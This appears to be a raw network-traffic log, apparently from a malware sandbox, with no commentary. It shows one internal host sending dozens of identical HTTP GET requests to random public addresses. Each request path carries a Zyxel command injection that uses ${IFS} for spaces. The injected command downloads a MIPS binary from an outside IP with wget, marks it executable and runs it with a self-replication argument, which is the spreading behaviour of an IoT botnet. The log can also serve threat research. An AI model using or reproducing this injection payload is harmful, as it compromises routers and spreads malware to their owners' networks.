                                    Jan 13, 2024 19:02:31.114248037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3712192.168.2.1348310197.174.89.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114276886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3713192.168.2.1334920178.113.126.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114326000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3714192.168.2.1347998162.29.81.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114379883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3715192.168.2.1359130151.58.5.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114466906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3716192.168.2.133884239.190.159.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114494085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3717192.168.2.1332898141.125.136.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114567995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3718192.168.2.134477239.7.54.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114614010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3719192.168.2.1350096143.172.163.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114656925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3720192.168.2.1344514156.178.130.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114753962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3721192.168.2.133704248.26.191.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114809990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3722192.168.2.133766259.205.44.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114890099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3723192.168.2.1333806212.158.60.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114962101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3724192.168.2.135725280.13.211.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115015030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3725192.168.2.134366042.248.79.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115076065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3726192.168.2.133287679.126.99.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115098953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3727192.168.2.1336234200.226.55.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115164995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3728192.168.2.134914469.186.221.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115241051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3729192.168.2.133721644.31.31.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115297079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3730192.168.2.1355504110.72.23.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115355968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3731192.168.2.1341968174.186.205.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115396976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3732192.168.2.1353318179.209.233.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115473986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3733192.168.2.1345682125.253.196.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115537882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3734192.168.2.1357572161.167.182.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115617990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3735192.168.2.1336946167.93.174.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115698099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3736192.168.2.1352198161.255.84.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115704060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3737192.168.2.1359698202.170.133.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115755081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3738192.168.2.1357136198.137.227.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115798950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3739192.168.2.1335774183.30.62.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115881920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3740192.168.2.1343236209.45.229.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115917921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3741192.168.2.1355672181.13.26.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.115957022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3742192.168.2.13603288.181.6.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116024017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3743192.168.2.134751217.244.128.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116081953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3744192.168.2.1350112219.229.115.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116117954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3745192.168.2.134637243.169.235.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116183996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3746192.168.2.1341750223.39.22.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116219044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3747192.168.2.1334476196.229.73.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116290092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3748192.168.2.1359780139.12.179.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116353035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3749192.168.2.1347250223.228.33.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116380930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3750192.168.2.1342302208.140.117.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116437912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3751192.168.2.1353700155.115.109.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116496086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3752192.168.2.1337188184.99.172.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116563082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3753192.168.2.134466819.49.22.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116599083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3754192.168.2.13569409.218.88.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116653919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3755192.168.2.1357614109.73.131.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116703033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3756192.168.2.1341196217.5.18.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116749048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3757192.168.2.1339890116.72.27.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116800070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3758192.168.2.1351788191.11.8.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116848946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3759192.168.2.1334848169.162.220.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116918087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3760192.168.2.1360368154.233.235.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.116978884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3761192.168.2.1344312160.183.230.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117031097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3762192.168.2.135617696.130.250.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117072105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3763192.168.2.1352988116.176.96.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117134094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3764192.168.2.1350418178.238.230.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117187023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3765192.168.2.133486463.46.56.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117248058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3766192.168.2.135357649.47.40.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117299080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3767192.168.2.1340518206.35.189.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117356062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3768192.168.2.135502079.78.204.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117403030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3769192.168.2.133940461.79.88.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117446899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3770192.168.2.1338754158.46.253.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117522955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3771192.168.2.135237042.38.194.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117574930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3772192.168.2.1343928158.38.73.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117619038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3773192.168.2.1350898131.185.98.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.117660046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3774192.168.2.1348394167.32.27.165443
                                    TimestampBytes transferredDirectionData
